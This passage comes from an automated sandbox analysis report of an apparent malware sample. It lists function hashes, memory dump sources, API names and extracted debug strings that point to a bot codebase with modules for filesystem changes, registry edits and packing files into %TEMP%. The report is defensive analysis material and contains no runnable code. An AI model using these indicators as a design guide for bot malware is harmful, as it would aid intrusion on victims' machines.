                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: rand_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 863162693-0
                                                                                                                                                  • Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                                                                                                                                                  • Instruction ID: b59c1da0986ae77e5bed2b1d34415447035f57f9dd87c0ff1ad5518bf61ef7b9
                                                                                                                                                  • Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                                                                                                                                                  • Instruction Fuzzy Hash: 67C04C36A18540CAD730DB28E8457597770F798308FD04211E65D86664CF3CD62FCF04
                                                                                                                                                  Function 00007FF8B9155A47 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalEnterSection
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1904992153-0
                                                                                                                                                  • Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                                                                                                                                                  • Instruction ID: 3d5bc5f1e61b4b7914237302588f4b708a614d2a2b3fff146f4abbe661271ea4
                                                                                                                                                  • Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                                                                                                                                                  • Instruction Fuzzy Hash: 13C02B90F1828283FF08AF7ABCD203402209FDC780F001038DB5E43392CE2CA8D4A300

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00007FF6BE03737B Relevance: 6.3, Strings: 5, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
                                                                                                                                                  • API String ID: 0-3120737415
                                                                                                                                                  • Opcode ID: 0155b2cfceccd6f71945aa0cab0ff097f3c2f2bdf7a7bcf957e5c8000f7d7100
                                                                                                                                                  • Instruction ID: f53c9121e9b56890ce6b2ba006886907d22b5c09e9b5c799a60fb2d236a250a3
                                                                                                                                                  • Opcode Fuzzy Hash: 0155b2cfceccd6f71945aa0cab0ff097f3c2f2bdf7a7bcf957e5c8000f7d7100
                                                                                                                                                  • Instruction Fuzzy Hash: 8E113AA1E0858781EA20DB189901BF92B71FF79345F845633F74DD62A4CF3CA22AD350
                                                                                                                                                  Function 00007FF6BE0332E7 Relevance: 49.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_mbscat_mbscpy$strcmp
                                                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                                                  • API String ID: 4213218670-1088979775
                                                                                                                                                  • Opcode ID: 31303a0d722c9ca0a8c953c8a7be86bf5be5c91f275c012ec7e42fc63c172e3d
                                                                                                                                                  • Instruction ID: a2100e3330859bb10b15d6ef153e705db5cdec23cd8be277e22202b0b7e55db2
                                                                                                                                                  • Opcode Fuzzy Hash: 31303a0d722c9ca0a8c953c8a7be86bf5be5c91f275c012ec7e42fc63c172e3d
                                                                                                                                                  • Instruction Fuzzy Hash: FFC1D2A190C68791FA30861C9580BFA6261EFBD385F944132FB5D87689DF3CE526C701
                                                                                                                                                  Function 00007FF6BE037D26 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 268stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
                                                                                                                                                  • API String ID: 39653677-2518748746
                                                                                                                                                  • Opcode ID: 949658d4fd798da9842280da9114dfd77417bf04ea3326cb13adcef7fb841c5d
                                                                                                                                                  • Instruction ID: 0021398fc663e8a9c72c15da32d068def3ac54da05e36e89303e8a91591d7594
                                                                                                                                                  • Opcode Fuzzy Hash: 949658d4fd798da9842280da9114dfd77417bf04ea3326cb13adcef7fb841c5d
                                                                                                                                                  • Instruction Fuzzy Hash: 80C17E61A0C74792EA209B59E940BBA6371FB78785F444132FB4DC7695EF3CE929C700
                                                                                                                                                  Function 00007FF6BE032CA9 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
                                                                                                                                                  • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                                                  • API String ID: 1390976747-812936415
                                                                                                                                                  • Opcode ID: 5af41fc07cfe3b547b3eefca12a7bd3cc9120f3de75317a8223d3097116fdf8d
                                                                                                                                                  • Instruction ID: a485bbb59fd1c16e9eebd294560fcb056ba7943ae94302da873f4b3b251ecbc9
                                                                                                                                                  • Opcode Fuzzy Hash: 5af41fc07cfe3b547b3eefca12a7bd3cc9120f3de75317a8223d3097116fdf8d
                                                                                                                                                  • Instruction Fuzzy Hash: 2AA1BF21A0C68395F7309B0DA694BBA6361AFBD386F540132F74DC7699EE3CE5258701
                                                                                                                                                  Function 00007FF6BE035E29 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenValuefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 716145365-253406552
                                                                                                                                                  • Opcode ID: 339897347ac0a2d08e280087a9f43797e5de4f412196aaf13a554498f04ddd1d
                                                                                                                                                  • Instruction ID: b33d82a945bc824071555de5929bd9e3700243361121cdab15756f1ceef97bbd
                                                                                                                                                  • Opcode Fuzzy Hash: 339897347ac0a2d08e280087a9f43797e5de4f412196aaf13a554498f04ddd1d
                                                                                                                                                  • Instruction Fuzzy Hash: 1A815025A0C70B82FA70DB4CB941B793260AF78744F444133FB5EC66A6EE5DE9A58342
                                                                                                                                                  Function 00007FF6BE035AC4 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseDeleteOpenValuefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 3240087161-1648311886
                                                                                                                                                  • Opcode ID: 62e57cf57ee6356259cec7bfbfd030278a47240fd7e32c31abfc4d8de364641a
                                                                                                                                                  • Instruction ID: c8b6e7f5f892c62490877c7089d894523bbda77634a8b46633d72b3350786cb3
                                                                                                                                                  • Opcode Fuzzy Hash: 62e57cf57ee6356259cec7bfbfd030278a47240fd7e32c31abfc4d8de364641a
                                                                                                                                                  • Instruction Fuzzy Hash: 05816061A0C70F81FA34A74CA948B787260AF78745F540133FB9EC66F5FE6DA9A58301
                                                                                                                                                  Function 00007FF6BE031F9E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$_mbscpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 3496426206-906809513
                                                                                                                                                  • Opcode ID: 1dee9945764b32408ed50647483c32612e7ab9312a1b55d70a295882058ca74b
                                                                                                                                                  • Instruction ID: c1907cc194aac4839adce4957f9d40f415d340f37c7743d4cd4747370dfe3354
                                                                                                                                                  • Opcode Fuzzy Hash: 1dee9945764b32408ed50647483c32612e7ab9312a1b55d70a295882058ca74b
                                                                                                                                                  • Instruction Fuzzy Hash: EB716022E0C64791FB705B5DEA40BB91261AFBC784F540132FB4ED7696DE6CE8A5C301
                                                                                                                                                  Function 00007FF6BE034CA0 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                                                                                                  • API String ID: 1332880857-1739142668
                                                                                                                                                  • Opcode ID: ec000305f97fcc9b7831efca2c653eed5ef4651eec74f5d45be2df6e378591d6
                                                                                                                                                  • Instruction ID: 77f0452d1f165861de21f01cf6838826c4c145b26fa9bf7f42b8edb4e27439cd
                                                                                                                                                  • Opcode Fuzzy Hash: ec000305f97fcc9b7831efca2c653eed5ef4651eec74f5d45be2df6e378591d6
                                                                                                                                                  • Instruction Fuzzy Hash: 87B1737690C54282F770874DE440B782262AFB8759F5A0133F75ECF6A9DE7CE9A68301
                                                                                                                                                  Function 00007FF6BE031849 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                                                  • API String ID: 1799206407-2463373822
                                                                                                                                                  • Opcode ID: 912818cb803c858290649b2350f006b194764e49bf29187046575fd208de8be6
                                                                                                                                                  • Instruction ID: 437adcaa0ef716d1c93c8a31813b19ebf2ccd89ec5d7c2c11845e23626524cb0
                                                                                                                                                  • Opcode Fuzzy Hash: 912818cb803c858290649b2350f006b194764e49bf29187046575fd208de8be6
                                                                                                                                                  • Instruction Fuzzy Hash: 4D5150A0E0C61B81FA345B4DA940BB82261BF7C794F540133EB5FC6AD0FE6DA9658302
                                                                                                                                                  Function 00007FF6BE039048 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastMetricsSystem$fflushfwrite
                                                                                                                                                  • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                                                                                                                                  • API String ID: 144387239-4168848430
                                                                                                                                                  • Opcode ID: eb4690e27fa6215081d6e6de91d6af8b90ce825f0c937a061c463600406fc136
                                                                                                                                                  • Instruction ID: ad9689b3156f48fb4b283946b361abe6f92d3f5451fe84045baa69c99209a218
                                                                                                                                                  • Opcode Fuzzy Hash: eb4690e27fa6215081d6e6de91d6af8b90ce825f0c937a061c463600406fc136
                                                                                                                                                  • Instruction Fuzzy Hash: 6A714950F0C54786FB74975CA904B7972A5EF38749F901033FB0EDA2DADEACA9A49301
                                                                                                                                                  Function 00007FF6BE0313B9 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                                                  • API String ID: 2123903355-1944070753
                                                                                                                                                  • Opcode ID: 36d7c1dc9db9ccf4b1edfea7063ef554aa244e211b5bc8d96b098d0b2331572f
                                                                                                                                                  • Instruction ID: 250d952c378ea516ca58ba6d82791d695f8734baca23527f715370af51a608c8
                                                                                                                                                  • Opcode Fuzzy Hash: 36d7c1dc9db9ccf4b1edfea7063ef554aa244e211b5bc8d96b098d0b2331572f
                                                                                                                                                  • Instruction Fuzzy Hash: 56412572A082428AE760CF6CE540A6977B1FB6C794F400236EB5DD3698EF3CE854CB00
                                                                                                                                                  Function 00007FF6BE0353F4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreate
